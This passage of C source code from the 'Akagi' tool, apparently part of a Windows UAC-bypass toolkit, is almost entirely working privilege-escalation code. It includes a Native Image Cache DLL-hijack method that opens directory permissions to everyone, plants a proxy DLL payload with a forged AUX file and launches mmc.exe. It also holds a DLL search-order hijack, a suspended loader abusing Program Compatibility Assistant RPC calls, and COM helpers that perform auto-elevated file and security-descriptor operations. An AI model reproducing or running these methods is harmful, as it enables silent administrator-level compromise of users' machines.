fEnvSet = supSetEnvVariable2(FALSE, NULL, T_WINDIR, szEnvVar);
if (fEnvSet == FALSE) {
break;
}
//
// Set loader command line.
//
szLoaderCmdLine[0] = (fUsePca) ? TEXT('1') : TEXT('3');
szLoaderCmdLine[1] = 0;
//
// Run loader suspended with parent set to shell process.
//
if (fUsePca) {
hShellProcess = supOpenShellProcess(PROCESS_CREATE_PROCESS);
if (hShellProcess == NULL) {
break;
}
processInfo.hProcess = supRunProcessFromParent(hShellProcess,
szLoader,
szLoaderCmdLine,
NULL,
CREATE_SUSPENDED | CREATE_NO_WINDOW,
0,
&processInfo.hThread);
}
else {
startupInfo.cb = sizeof(startupInfo);
if (!CreateProcess(
szLoader,
szLoaderCmdLine,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED | CREATE_NO_WINDOW,
NULL,
NULL,
&startupInfo,
&processInfo))
{
break;
}
}
if (processInfo.hProcess == NULL) {
break;
}
rpcStatus = supCreateBindingHandle(PCASVC_RPC, &rpcHandle);
if (rpcStatus == RPC_S_OK) {
if (fUsePca) {
__try {
rpcStatus = RAiMonitorProcess(
rpcHandle,
(ULONG_PTR)processInfo.hProcess,
0,
szLoader,
szLoaderCmdLine,
g_ctx->szCurrentDirectory,
PCA_MONITOR_PROCESS_NORMAL);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
rpcStatus = GetExceptionCode();
}
}
else {
__try {
rpcStatus = RAiNotifyUserCallbackExceptionProcess(
rpcHandle,
szLoader,
1,
processInfo.dwProcessId);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
rpcStatus = GetExceptionCode();
}
}
RpcBindingFree(&rpcHandle);
}
if (rpcStatus != RPC_S_OK)
break;
ResumeThread(processInfo.hThread);
WaitForSingleObject(processInfo.hProcess, INFINITE);
if (fUsePca) {
GetExitCodeProcess(processInfo.hProcess, &ulResult);
if (ulResult != 0)
break;
}
WaitForSingleObject(hSharedEvent, 20 * 1000);
MethodResult = (pvLoaderBlock->OpResult == FUBUKI_PCA_ALL_RUN) ? STATUS_SUCCESS : STATUS_ACCESS_DENIED;
} while (FALSE);
Sleep(2000);
//
// Cleanup.
//
if (processInfo.hThread)
CloseHandle(processInfo.hThread);
if (processInfo.hProcess) {
TerminateProcess(processInfo.hProcess, ERROR_SUCCESS);
CloseHandle(processInfo.hProcess);
}
if (hSharedEvent)
NtClose(hSharedEvent);
if (pvLoaderBlock)
NtUnmapViewOfSection(NtCurrentProcess(), (PVOID)pvLoaderBlock);
if (hSharedSection)
NtClose(hSharedSection);
if (fEnvSet)
supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);
if (fUsePca) {
ucmxRemoveLoaderEntryFromRegistry(
HKEY_CURRENT_USER,
T_PCA_STORE,
szLoaderName);
}
else {
ucmxRemoveLoaderEntryFromRegistry(
HKEY_LOCAL_MACHINE,
T_APPCOMPAT_LAYERS,
szLoaderName);
ucmxRemoveLoaderEntryFromRegistry(
HKEY_CURRENT_USER,
T_PCA_PERSISTED,
szLoaderName);
}
if (fLoaderCreated) {
DeleteFile(szLoader);
}
if (fDirCreated) {
DeleteFile(szBuffer);
szBuffer[cchDirName] = 0;
RemoveDirectory(szBuffer);
}
if (SUCCEEDED(hr_init))
CoUninitialize();
if (MethodResult != STATUS_SUCCESS)
supSetGlobalCompletionEvent();
return MethodResult;
}
NTSTATUS ucmxGenerateAUX(
_In_ LPCWSTR AssemblyName,
_Out_ PVOID* AuxData,
_Out_ PSIZE_T AuxDataSize,
_Out_opt_ GUID* ModuleGuid
)
{
NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
LPWSTR lpAssemblyFilePath = NULL;
HRESULT hr;
IAssemblyCache* asmCache = NULL;
IAssemblyEnum* asmEnum = NULL;
IAssemblyName* asmName = NULL;
GUID mvid;
LPWSTR lpAssemblyName = NULL, lpDisplayName = NULL;
LPSTR lpDisplayNameANSI = NULL;
BOOL bFound = FALSE;
SIZE_T auxSize = 0;
PBYTE auxPtr = NULL, pbPad;
PULONG dataPtr;
SIZE_T cchName = 0, cchDisplayName = 0, padBytes, i;
*AuxData = NULL;
*AuxDataSize = 0;
if (!fusUtilInitFusion((g_ctx->dwBuildNumber < NT_WIN8_RTM) ? 2 : 4))
return ntStatus;
RtlSecureZeroMemory(&mvid, sizeof(mvid));
do {
hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_GAC, NULL);
if ((FAILED(hr)) || (asmEnum == NULL))
break;
hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);
if ((FAILED(hr)) || (asmCache == NULL))
break;
//
// Locate assembly and remember it name/display name.
//
while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {
if (SUCCEEDED(fusUtilGetAssemblyName(asmName,
&lpAssemblyName,
&cchName,
&lpDisplayName,
&cchDisplayName)))
{
if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {
bFound = TRUE;
break;
}
else {
supHeapFree(lpAssemblyName);
supHeapFree(lpDisplayName);
lpAssemblyName = NULL;
lpDisplayName = NULL;
}
}
asmName->lpVtbl->Finalize(asmName);
asmName->lpVtbl->Release(asmName);
asmName = NULL;
}
if (FAILED(hr) || bFound == FALSE) {
if (asmName) {
asmName->lpVtbl->Finalize(asmName);
asmName->lpVtbl->Release(asmName);
asmName = NULL;
}
break;
}
lpDisplayNameANSI = (LPSTR)supHeapAlloc((1 + cchDisplayName) * sizeof(CHAR));
if (lpDisplayNameANSI == NULL)
break;
WideCharToMultiByte(CP_ACP,
0,
lpDisplayName,
(INT)cchDisplayName,
lpDisplayNameANSI,
(INT)(1 + cchDisplayName),
NULL,
NULL);
//
// Query assembly filepath.
//
hr = fusUtilGetAssemblyPath(asmCache, AssemblyName, &lpAssemblyFilePath);
if (FAILED(hr))
break;
//
// Remember MVID.
//
if (!fusUtilGetImageMVID(lpAssemblyFilePath, &mvid))
break;
//
// Allocate buffer for AUX data.
//
auxSize = ALIGN_UP_TYPE(100 + (SIZE_T)cchDisplayName, sizeof(ULONG));
auxPtr = (PBYTE)supHeapAlloc(auxSize);
if (auxPtr == NULL)
break;
dataPtr = (PULONG)auxPtr;
//
// Magic values go brrr.
//
*dataPtr++ = 0x5;
*dataPtr++ = (ULONG)auxSize - 8;
*dataPtr++ = 0xB;
*dataPtr++ = (ULONG)auxSize - 16;
*dataPtr++ = 0xD;
*dataPtr++ = (ULONG)auxSize - 100;
RtlCopyMemory(dataPtr, lpDisplayNameANSI, cchDisplayName);
padBytes = (auxSize - 100) - cchDisplayName;
pbPad = (PBYTE)RtlOffsetToPointer(dataPtr, cchDisplayName);
for (i = 0; i < padBytes; i++)
*pbPad++ = 0xCC;
dataPtr = (PULONG)RtlOffsetToPointer(dataPtr, cchDisplayName + padBytes);
*dataPtr++ = 0x7;
*dataPtr++ = 0x4;
*dataPtr++ = 0x1109;
*dataPtr++ = 0x2;
*dataPtr++ = 0x8;
*dataPtr++ = 0;
*dataPtr++ = 0;
*dataPtr++ = 0xF;
*dataPtr++ = 0x4;
*dataPtr++ = 0;
*dataPtr++ = 0x10;
*dataPtr++ = 0x4;
*dataPtr++ = 0x1;
*dataPtr++ = 0x9;
*dataPtr++ = 0x10;
RtlCopyMemory(dataPtr, &mvid, sizeof(mvid));
*AuxData = auxPtr;
*AuxDataSize = auxSize;
if (ModuleGuid) *ModuleGuid = mvid;
ntStatus = STATUS_SUCCESS;
} while (FALSE);
if (lpAssemblyFilePath)
supHeapFree(lpAssemblyFilePath);
if (lpAssemblyName)
supHeapFree(lpAssemblyName);
if (lpDisplayName)
supHeapFree(lpDisplayName);
if (lpDisplayNameANSI)
supHeapFree(lpDisplayNameANSI);
if (asmName) {
asmName->lpVtbl->Finalize(asmName);
asmName->lpVtbl->Release(asmName);
}
if (asmCache)
asmCache->lpVtbl->Release(asmCache);
if (asmEnum)
asmEnum->lpVtbl->Release(asmEnum);
if (!NT_SUCCESS(ntStatus) && auxPtr)
supHeapFree(auxPtr);
return ntStatus;
}
/*
* ucmNICPoisonMethod2
*
* Purpose:
*
* Bypass UAC by by Dll hijack of Native Image Cache.
*
*/
NTSTATUS ucmNICPoisonMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;
WCHAR szFileName[MAX_PATH * 2];
WCHAR szTargetDir[MAX_PATH * 2];
WCHAR szCacheDir[MAX_PATH * 2];
WCHAR szMVID[64];
LPWSTR oldSecurity = NULL;
SIZE_T dirLen;
GUID targetMVID;
PVOID auxData = NULL;
SIZE_T auxDataSize;
BOOL bNeedSecurityReset = FALSE, bNeedRestore = FALSE;
BOOL IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);
do {
//
// Build cache path.
//
_strcpy(szCacheDir, g_ctx->szSystemRoot);
_strcat(szCacheDir, TEXT("assembly\\NativeImages_"));
if (IsWin7)
_strcat(szCacheDir, NET2_DIR);
else
_strcat(szCacheDir, NET4_DIR);
#ifdef _WIN64
_strcat(szCacheDir, TEXT("_64"));
#else
_strcat(szCacheDir, TEXT("_32"));
#endif
ntStatus = ucmxGenerateAUX(ASSEMBLY_MMCEX, &auxData, &auxDataSize, NULL);
if (!NT_SUCCESS(ntStatus)) {
MethodResult = ntStatus;
break;
}
RtlSecureZeroMemory(&szMVID, sizeof(szMVID));
RtlSecureZeroMemory(&targetMVID, sizeof(targetMVID));
if (!fusUtilGetAssemblyMVIDFromZapCache(ASSEMBLY_MMCEX, &targetMVID))
break;
fusUtilBinToUnicodeHex((PBYTE)&targetMVID, sizeof(GUID), szMVID);
//
// Remember old directory security permissions.
//
if (!ucmMasqueradedGetObjectSecurityCOM(szCacheDir,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
&oldSecurity))
{
break;
}
//
// Reset target file permissions.
//
if (!ucmMasqueradedSetObjectSecurityCOM(szCacheDir,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
T_SDDL_EVERYONE_FULL_ACCESS))
{
break;
}
bNeedSecurityReset = TRUE;
//
// Move MMCEx to MMCEx.$
//
_strcpy(szFileName, szCacheDir);
_strcat(szFileName, MMCEX_DIR);
_strcpy(szTargetDir, szFileName);
_strcat(szTargetDir, TEXT(".$"));
if (!MoveFileEx(szFileName,
szTargetDir,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
{
break;
}
bNeedRestore = TRUE;
//
// 1. MMCEx
// 2. MMCEx\\
// 3. MMCEx\\MMCEx.ni.dll
// 4. MMCEx\\MMCEx.ni.aux
//
// 1. MMCEx
//
if (!CreateDirectory(szFileName, NULL))
if (GetLastError() != ERROR_ALREADY_EXISTS) {
break;
}
//
// 2. Subdirectory
//
supPathAddBackSlash(szFileName);
_strcat(szFileName, szMVID);
if (!CreateDirectory(szFileName, NULL))
if (GetLastError() != ERROR_ALREADY_EXISTS) {
break;
}
//
// 3. Drop payload.
//
supPathAddBackSlash(szFileName);
dirLen = _strlen(szFileName);
_strcat(szFileName, MMCEX_NI_DLL);
if (!supWriteBufferToFile(szFileName, ProxyDll, ProxyDllSize)) {
break;
}
//
// 4. Drop aux payload.
//
szFileName[dirLen] = 0;
_strcat(szFileName, MMCEX_NI_DLL_AUX);
if (!supWriteBufferToFile(szFileName, auxData, (ULONG)auxDataSize)) {
break;
}
//
// Run target.
//
_strcpy(szFileName, g_ctx->szSystemDirectory);
_strcat(szFileName, MMC_EXE);
if (supRunProcess2(szFileName,
WF_MSC,
NULL,
SW_SHOW,
SUPRUNPROCESS_TIMEOUT_DEFAULT))
{
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (bNeedRestore) {
//
// Remove fake directory.
//
_strcpy(szFileName, szCacheDir);
_strcat(szFileName, MMCEX_DIR);
supRemoveDirectoryRecursive(szFileName);
//
// Restore original MMCEx directory.
//
_strcat(szFileName, TEXT(".$"));
_strcpy(szTargetDir, szCacheDir);
_strcat(szTargetDir, MMCEX_DIR);
MoveFileEx(szFileName,
szTargetDir,
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);
}
//
// Revert directory security.
//
if (oldSecurity) {
if (bNeedSecurityReset) {
ucmMasqueradedSetObjectSecurityCOM(szCacheDir,
DACL_SECURITY_INFORMATION,
SE_FILE_OBJECT,
oldSecurity);
}
CoTaskMemFree(oldSecurity);
}
if (auxData)
supHeapFree(auxData);
if (!NT_SUCCESS(MethodResult))
supSetGlobalCompletionEvent();
return MethodResult;
}
/*
* ucmAtlHijackMethod
*
* Purpose:
*
* Bypass UAC by abusing search order of WMI management console dependency dll.
*
*/
NTSTATUS ucmAtlHijackMethod(
_In_opt_ LPCWSTR lpTargetApp,
_In_ LPCWSTR lpTargetDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
return ucmGenericAutoelevationEx(lpTargetApp,
lpTargetDll,
WMIMGMT_MSC,
WBEM_DIR,
ProxyDll,
ProxyDllSize);
}
================================================
FILE: Source/Akagi/methods/comsup.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2021
*
* TITLE: COMSUP.C
*
* VERSION: 3.57
*
* DATE: 01 Nov 2021
*
* COM interfaces based routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmAllocateElevatedObject
*
* Purpose:
*
* CoGetObject elevation as admin.
*
*/
HRESULT ucmAllocateElevatedObject(
_In_ LPCWSTR lpObjectCLSID,
_In_ REFIID riid,
_In_ DWORD dwClassContext,
_Outptr_ void **ppv
)
{
DWORD classContext;
HRESULT hr = E_FAIL;
PVOID ElevatedObject = NULL;
/*
CLSID xCLSID;
IUnknown *IBase;
*/
BIND_OPTS3 bop;
WCHAR szMoniker[MAX_PATH];
do {
if (_strlen(lpObjectCLSID) > 64)
break;
/*
if (NOERROR == CLSIDFromString(
lpObjectCLSID,
&xCLSID))
{
hr = CoCreateInstance(
&xCLSID,
NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
riid,
&IBase);
if (hr == S_OK) {
IBase->lpVtbl->Release(IBase);
}
}
*/
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
classContext = dwClassContext;
if (dwClassContext == 0)
classContext = CLSCTX_LOCAL_SERVER;
bop.dwClassContext = classContext;
_strcpy(szMoniker, T_ELEVATION_MONIKER_ADMIN);
_strcat(szMoniker, lpObjectCLSID);
hr = CoGetObject(szMoniker, (BIND_OPTS *)&bop, riid, &ElevatedObject);
} while (FALSE);
*ppv = ElevatedObject;
return hr;
}
/*
* ucmxFileOpCreateAndRelease
*
* Purpose:
*
* Test create new instance IFileOperation.
*
*/
VOID ucmxFileOpCreateAndRelease(VOID)
{
IFileOperation *FileOperation = NULL;
if (S_OK != CoCreateInstance(
&CLSID_FileOperation,
NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation))
{
return;
}
if (FileOperation != NULL) {
FileOperation->lpVtbl->Release(FileOperation);
}
}
/*
* ucmMasqueradedRenameElementCOM
*
* Purpose:
*
* Rename file/directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPCWSTR OldName,
_In_ LPCWSTR NewName
)
{
BOOL bResult = FALSE;
IFileOperation *FileOperation = NULL;
IShellItem *psiDestDir = NULL;
HRESULT hr_init;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//ucmxFileOpCreateAndRelease();
if (S_OK != ucmAllocateElevatedObject(
T_CLSID_FileOperation,
&IID_IFileOperation,
CLSCTX_LOCAL_SERVER,
&FileOperation))
{
break;
}
if (FileOperation == NULL) {
break;
}
if (S_OK != FileOperation->lpVtbl->SetOperationFlags(
FileOperation,
g_ctx->IFileOperationFlags))
{
break;
}
if (S_OK != SHCreateItemFromParsingName(
OldName,
NULL,
&IID_IShellItem,
&psiDestDir))
{
break;
}
if (S_OK != FileOperation->lpVtbl->RenameItem(
FileOperation,
psiDestDir,
NewName,
NULL))
{
break;
}
if (S_OK != FileOperation->lpVtbl->PerformOperations(
FileOperation))
{
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (FALSE);
if (FileOperation != NULL) {
FileOperation->lpVtbl->Release(FileOperation);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
if (hr_init == S_OK)
CoUninitialize();
return bResult;
}
/*
* ucmMasqueradedCreateSubDirectoryCOM
*
* Purpose:
*
* Create directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPCWSTR ParentDirectory,
_In_ LPCWSTR SubDirectory
)
{
BOOL bResult = FALSE;
IFileOperation *FileOperation = NULL;
IShellItem *psiDestDir = NULL;
HRESULT hr_init;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//ucmxFileOpCreateAndRelease();
if (S_OK != ucmAllocateElevatedObject(
T_CLSID_FileOperation,
&IID_IFileOperation,
CLSCTX_LOCAL_SERVER,
&FileOperation))
{
break;
}
if (FileOperation == NULL) {
break;
}
if (S_OK != FileOperation->lpVtbl->SetOperationFlags(
FileOperation,
g_ctx->IFileOperationFlags))
{
break;
}
if (S_OK != SHCreateItemFromParsingName(
ParentDirectory,
NULL,
&IID_IShellItem,
&psiDestDir))
{
break;
}
if (S_OK != FileOperation->lpVtbl->NewItem(
FileOperation,
psiDestDir,
FILE_ATTRIBUTE_DIRECTORY,
SubDirectory,
NULL,
NULL))
{
break;
}
if (S_OK != FileOperation->lpVtbl->PerformOperations(
FileOperation))
{
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (FALSE);
if (FileOperation != NULL) {
FileOperation->lpVtbl->Release(FileOperation);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
if (hr_init == S_OK)
CoUninitialize();
return bResult;
}
/*
* ucmMasqueradedMoveCopyFileCOM
*
* Purpose:
*
* Move or Copy file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPCWSTR SourceFileName,
_In_ LPCWSTR DestinationDir,
_In_ BOOL fMove
)
{
BOOL bResult = FALSE;
IFileOperation *FileOperation = NULL;
IShellItem *isrc = NULL, *idst = NULL;
HRESULT r = E_FAIL, hr_init;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//ucmxFileOpCreateAndRelease();
if (S_OK != ucmAllocateElevatedObject(
T_CLSID_FileOperation,
&IID_IFileOperation,
CLSCTX_LOCAL_SERVER,
&FileOperation))
{
break;
}
if (FileOperation == NULL) {
break;
}
if (S_OK != FileOperation->lpVtbl->SetOperationFlags(
FileOperation,
g_ctx->IFileOperationFlags))
{
break;
}
if (S_OK != SHCreateItemFromParsingName(
SourceFileName,
NULL,
&IID_IShellItem,
&isrc))
{
break;
}
if (S_OK != SHCreateItemFromParsingName(
DestinationDir,
NULL,
&IID_IShellItem,
&idst))
{
break;
}
if (fMove) {
r = FileOperation->lpVtbl->MoveItem(
FileOperation,
isrc,
idst,
NULL,
NULL);
}
else {
r = FileOperation->lpVtbl->CopyItem(
FileOperation,
isrc,
idst,
NULL,
NULL);
}
if (r != S_OK)
break;
if (S_OK != FileOperation->lpVtbl->PerformOperations(
FileOperation))
{
break;
}
idst->lpVtbl->Release(idst);
idst = NULL;
isrc->lpVtbl->Release(isrc);
isrc = NULL;
bResult = TRUE;
} while (FALSE);
if (FileOperation != NULL)
FileOperation->lpVtbl->Release(FileOperation);
if (isrc != NULL)
isrc->lpVtbl->Release(isrc);
if (idst != NULL)
idst->lpVtbl->Release(idst);
if (hr_init == S_OK)
CoUninitialize();
return bResult;
}
/*
* ucmMasqueradedDeleteDirectoryFileCOM
*
* Purpose:
*
* Delete directory or file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedDeleteDirectoryFileCOM(
_In_ LPCWSTR FileName
)
{
BOOL bResult = FALSE;
IFileOperation *FileOperation = NULL;
IShellItem *isrc = NULL;
HRESULT r = E_FAIL, hr_init;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//ucmxFileOpCreateAndRelease();
if (S_OK != ucmAllocateElevatedObject(
T_CLSID_FileOperation,
&IID_IFileOperation,
CLSCTX_LOCAL_SERVER,
&FileOperation))
{
break;
}
if (FileOperation == NULL) {
break;
}
if (S_OK != FileOperation->lpVtbl->SetOperationFlags(
FileOperation,
g_ctx->IFileOperationFlags))
{
break;
}
if (S_OK != SHCreateItemFromParsingName(
FileName,
NULL,
&IID_IShellItem,
&isrc))
{
break;
}
r = FileOperation->lpVtbl->DeleteItem(
FileOperation,
isrc,
NULL);
if (r != S_OK)
break;
if (S_OK != FileOperation->lpVtbl->PerformOperations(
FileOperation))
{
break;
}
isrc->lpVtbl->Release(isrc);
isrc = NULL;
bResult = TRUE;
} while (FALSE);
if (FileOperation != NULL)
FileOperation->lpVtbl->Release(FileOperation);
if (isrc != NULL)
isrc->lpVtbl->Release(isrc);
if (hr_init == S_OK)
CoUninitialize();
#ifdef _DEBUG
if (bResult) {
OutputDebugString(FileName);
OutputDebugString(TEXT("\r\nCleanup success\r\n"));
}
else {
OutputDebugString(TEXT("\r\nCleanup failed\r\n"));
}
#endif
return bResult;
}
/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPCWSTR SourceFileName,
_In_ LPCWSTR DestinationDir
)
{
return ucmMasqueradedMoveCopyFileCOM(
SourceFileName,
DestinationDir,
TRUE);
}
/*
* ucmMasqueradedGetObjectSecurityCOM
*
* Purpose:
*
* Get object security through ISecurityEditor(GetNamedInfo).
* This function expects that supMasqueradeProcess was called on process initialization.
*
* Note:
* Use CoTaskMemFree to release Sddl allocated memory as SecurityEditor->GetSecurity uses SHStrDupW to store result SSDL.
*
*/
BOOL ucmMasqueradedGetObjectSecurityCOM(
_In_ LPCWSTR lpTargetObject,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ SE_OBJECT_TYPE ObjectType,
_Inout_ LPOLESTR *Sddl
)
{
HRESULT r = E_FAIL, hr_init;
ISecurityEditor* SecurityEditor = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
r = ucmAllocateElevatedObject(
T_CLSID_ShellSecurityEditor,
&IID_ISecurityEditor,
CLSCTX_LOCAL_SERVER,
&SecurityEditor);
if (r != S_OK)
break;
if (SecurityEditor == NULL) {
r = E_OUTOFMEMORY;
break;
}
r = SecurityEditor->lpVtbl->GetSecurity(
SecurityEditor,
lpTargetObject,
ObjectType,
SecurityInformation,
Sddl);
} while (FALSE);
if (SecurityEditor != NULL) {
SecurityEditor->lpVtbl->Release(SecurityEditor);
}
if (hr_init == S_OK)
CoUninitialize();
return SUCCEEDED(r);
}
/*
* ucmMasqueradedSetObjectSecurityCOM
*
* Purpose:
*
* Change object security through ISecurityEditor(SetNamedInfo).
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedSetObjectSecurityCOM(
_In_ LPCWSTR lpTargetObject,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ SE_OBJECT_TYPE ObjectType,
_In_ LPCWSTR NewSddl
)
{
HRESULT r = E_FAIL, hr_init;
ISecurityEditor* SecurityEditor = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
r = ucmAllocateElevatedObject(
T_CLSID_ShellSecurityEditor,
&IID_ISecurityEditor,
CLSCTX_LOCAL_SERVER,
&SecurityEditor);
if (r != S_OK)
break;
if (SecurityEditor == NULL) {
r = E_OUTOFMEMORY;
break;
}
r = SecurityEditor->lpVtbl->SetSecurity(
SecurityEditor,
lpTargetObject,
ObjectType,
SecurityInformation,
NewSddl);
} while (FALSE);
if (SecurityEditor != NULL) {
SecurityEditor->lpVtbl->Release(SecurityEditor);
}
if (hr_init == S_OK)
CoUninitialize();
return SUCCEEDED(r);
}
================================================
FILE: Source/Akagi/methods/comsup.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2022
*
* TITLE: COMSUP.H
*
* VERSION: 3.63
*
* DATE: 16 Jul 2022
*
* Prototypes and definitions for COM interfaces and routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#define HRESULT_BREAK_ON_FAILED(hr) { if (FAILED(hr)) break; }
#define HRESULT_RETURN_ON_FAILED(hr) { if (FAILED(hr)) return; }
#define HRESULT_RETURN_VALUE_ON_FAILED(hr, value) { if (FAILED(hr)) return value; }
#ifndef UCM_DEFINE_GUID
#define UCM_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
EXTERN_C const GUID DECLSPEC_SELECTANY name \
= { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
#endif
UCM_DEFINE_GUID(IID_IColorDataProxy, 0x0A16D195, 0x6F47, 0x4964, 0x92, 0x87, 0x9F, 0x4B, 0xAB, 0x6D, 0x98, 0x27);
UCM_DEFINE_GUID(IID_ICMLuaUtil, 0x6EDD6D74, 0xC007, 0x4E75, 0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C);
UCM_DEFINE_GUID(IID_IFwCplLua, 0x56DA8B35, 0x7FC3, 0x45DF, 0x87, 0x68, 0x66, 0x41, 0x47, 0x86, 0x45, 0x73);
UCM_DEFINE_GUID(IID_ISecurityEditor, 0x14B2C619, 0xD07A, 0x46EF, 0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C);
UCM_DEFINE_GUID(IID_EditionUpgradeManager, 0xF2DCB80D, 0x0670, 0x44BC, 0x90, 0x02, 0xCD, 0x18, 0x68, 0x87, 0x30, 0xAF);
UCM_DEFINE_GUID(IID_IEAxiAdminInstaller, 0x9AEA8A59, 0xE0C9, 0x40F1, 0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77);
UCM_DEFINE_GUID(IID_IEAxiInstaller2, 0xBC0EC710, 0xA3ED, 0x4F99, 0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3);
UCM_DEFINE_GUID(IID_WscAdmin, 0x49ACAA99, 0xF009, 0x4524, 0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 0x60);
UCM_DEFINE_GUID(IID_ElevatedFactoryServer, 0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08);
HRESULT ucmAllocateElevatedObject(
_In_ LPCWSTR lpObjectCLSID,
_In_ REFIID riid,
_In_ DWORD dwClassContext,
_Outptr_ void **ppv);
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPCWSTR ParentDirectory,
_In_ LPCWSTR SubDirectory);
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPCWSTR SourceFileName,
_In_ LPCWSTR DestinationDir,
_In_ BOOL fMove);
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPCWSTR SourceFileName,
_In_ LPCWSTR DestinationDir);
BOOL ucmMasqueradedDeleteDirectoryFileCOM(
_In_ LPCWSTR FileName);
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPCWSTR OldName,
_In_ LPCWSTR NewName);
BOOL ucmMasqueradedGetObjectSecurityCOM(
_In_ LPCWSTR lpTargetObject,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ SE_OBJECT_TYPE ObjectType,
_Inout_ LPOLESTR *Sddl);
BOOL ucmMasqueradedSetObjectSecurityCOM(
_In_ LPCWSTR lpTargetObject,
_In_ SECURITY_INFORMATION SecurityInformation,
_In_ SE_OBJECT_TYPE ObjectType,
_In_ LPCWSTR NewSddl);
================================================
FILE: Source/Akagi/methods/dwells.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2020
*
* TITLE: DWELLS.C
*
* VERSION: 3.50
*
* DATE: 14 Sep 2020
*
* David Wells based method.
*
* Original method URL:
* https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmDirectoryMockMethod
*
* Purpose:
*
* UAC bypass abusing GetLongPathNameW behavior during AIS.
*
*/
NTSTATUS ucmDirectoryMockMethod(
_In_ PVOID ProxyDll,
